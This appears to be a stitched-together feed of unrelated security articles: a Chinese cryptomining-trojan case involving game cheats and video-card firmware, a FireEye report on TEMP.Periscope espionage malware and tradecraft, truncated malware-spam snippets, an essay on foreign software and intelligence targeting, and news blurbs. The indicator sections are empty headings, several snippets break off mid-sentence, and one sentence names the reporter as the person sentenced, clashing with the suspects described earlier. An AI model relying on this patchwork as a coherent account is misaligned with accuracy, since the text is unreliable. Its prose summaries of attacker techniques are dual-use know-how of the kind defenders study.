The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well.  As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao participated as a forum moderator on a site called the "Tianxia Internet Bar Forum" and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Mobao was popularizing the cheat program by encouraging others to make suggestions for new functionality.  The users who were using the tool did not suspect that they were actually mining crypto-currency while using the cheat.  More than 30,000 victims were using his cheat software and secretly mining crypto-currency for him.
Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes.  He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining.  It turns out that these cards ALSO were trojaned!  As a major customer of Dalian Yuping, Moubao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked management Internet cafes.  After experiencing some profit from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province.  The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes.  The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans.  In addition to the illegal advertising software embedded in those 3.89 million video cards, their crypto currency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
 16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems.  Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.


The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.







HOMEFRY, a 64-bit Windows password dumper/cracker



MURKYTOP, a command-line reconnaissance tool 



AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators






AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages



Beacon, a commercially available backdoor



PHOTO, also reported as Derusbi



BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

Multiple badness on /

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic. Subject:       New BT BillFrom:       "BT Business" []Date:       Thu, August 24, 2017 6:08 pmPriority:       NormalFrom BTNew BT BillYour bill amount is: $106.84This doesn't include any amounts brought forward from any other bills.We've put your latest

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP. Subject:       Voice Message Attached from 001396445685 - name unavailable From:       "Voice Message" Date:       Wed, August 23, 2017 10:22 am Time: Wed, 23 Aug 2017 14:52:12 +0530 Download

Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.. Subject:       imagesFrom:       "Sophia Passmore" [Sophia5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Sophia Passmore*Subject:       please printFrom:       "Roberta Pethick" [Roberta5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Roberta Pethick* In these two

Five Reasons I Want China Running Its Own Software

Periodically I read about efforts by China, or Russia, or North Korea, or other countries to replace American software with indigenous or semi-indigenous alternatives. I then reply via Twitter that I love the idea, with a short reason why. This post will list the top five reasons why I want China and other likely targets of American foreign intelligence collection to run their own software.

1. Many (most?) non-US software companies write lousy code. The US is by no means perfect, but our developers and processes generally appear to be superior to foreign indigenous efforts. Cisco vs Huawei is a good example. Cisco has plenty of problems, but it has processes in place to manage them, plus secure code development practices. Lousy indigenous code means it is easier for American intelligence agencies to penetrate foreign targets. (An example of a foreign country that excels in writing code is Israel, but thankfully it is not the same sort of priority target like China, Russia, or North Korea.)

2. Many (most?) non-US enterprises are 5-10 years behind US security practices. Even if a foreign target runs decent native code, the IT processes maintaining that code are lagging compared to American counterparts. Again, the US has not solved this problem by any stretch of the imagination. However, relatively speaking, American inventory management, patch management, and security operations have the edge over foreign intelligence targets. Because non-US enterprises running indigenous code will not necessarily be able to benefit from American expertise (as they might if they were running American code), these deficiencies will make them easier targets for foreign exploitation.

3. Foreign targets running foreign code is win-win for American intel and enterprises. The current vulnerability equities process (VEP) puts American intelligence agencies in a quandary. The IC develops a zero-day exploit for a vulnerability, say for use against Cisco routers. American and Chinese organizations use Cisco routers. Should the IC sit on the vulnerability in order to maintain access to foreign targets, or should it release the vulnerability to Cisco to enable patching and thereby protect American and foreign systems?

This dilemma disappears in a world where foreign targets run indigenous software. If the IC identifies a vulnerability in Cisco software, and the majority of its targets run non-Cisco software, then the IC is more likely (or should be pushed to be more likely) to assist with patching the vulnerable software. Meanwhile, the IC continues to exploit Huawei or other products at its leisure.

4. Writing and running indigenous code is the fastest way to improve. When foreign countries essentially outsource their IT to vendors, they become program managers. They lose or never develop any ability to write and run quality software. Writing and running your own code will enroll foreign organizations in the security school of hard knocks. American intel will have a field day for 3-5 years against these targets, as they flail around in a perpetual state of compromise. However, if they devote the proper native resources and attention, they will learn from their mistakes. They will write and run better software. Now, this means they will become harder targets for American intel, but American intel will retain the advantage of point 3.

5. Trustworthy indigenous code will promote international stability. Countries like China feel especially vulnerable to American exploitation. They have every reason to be scared. They run code written by other organizations. They don't patch it or manage it well. Their security operations stink. The American intel community could initiate a complete moratorium on hacking China, and the Chinese would still be ravaged by other countries or criminal hackers, all the while likely blaming American intel. They would not be able to assess the situation. This makes for a very unstable situation.

Therefore, countries like China and others are going down the indigenous software path. They understand that software, not oil as Daniel Yergen once wrote, is now the "commanding heights" of the economy. Pursuing this course will subject these countries to many years of pain. However, in the end I believe it will yield a more stable situation. These countries should begin to perceive that they are less vulnerable. They will experience their own vulnerability equity process. They will be more aware and less paranoid.

In this respect, indigenous software is a win for global politics. The losers, of course, are global software companies. Foreign countries will continue to make short-term deals to suck intellectual property and expertise from American software companies, before discarding them on the side of Al Gore's information highway.

One final point -- a way foreign companies could jump-start their indigenous efforts would be to leverage open source software. I doubt they would necessarily honor licenses which require sharing improvements with the open source community. However, open source would give foreign organizations the visibility they need and access to expertise that they lack. Microsoft's shared source and similar programs were a step in this direction, but I suggest foreign organizations adopt open source instead.

Now, widespread open source adoption by foreign intelligence targets would erode the advantages for American intel that I explained in point 3. I'm betting that foreign leaders are likely similar to Americans in that they tend to not trust open source, and prefer to roll their own and hold vendors accountable. Therefore I'm not that worried, from an American intel perspective, about point 3 being vastly eroded by widespread foreign open source adoption.

TeePublic is running a sale until midnight ET Thursday! Get a TaoSecurity Milnet T-shirt for yourself and a friend!

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

The U.S. Electrical Grid More Vulnerable Than Ever

The U.S. electrical grid is more vulnerable today than it has ever been. Cyber attacks have the potential to disrupt large segments of the electrical grid, and top experts confirm that the U.S. is not prepared for this risk. Watch the 60 Minutes Video.


The post The U.S. Electrical Grid More Vulnerable Than Ever appeared first on Quick Start Survival.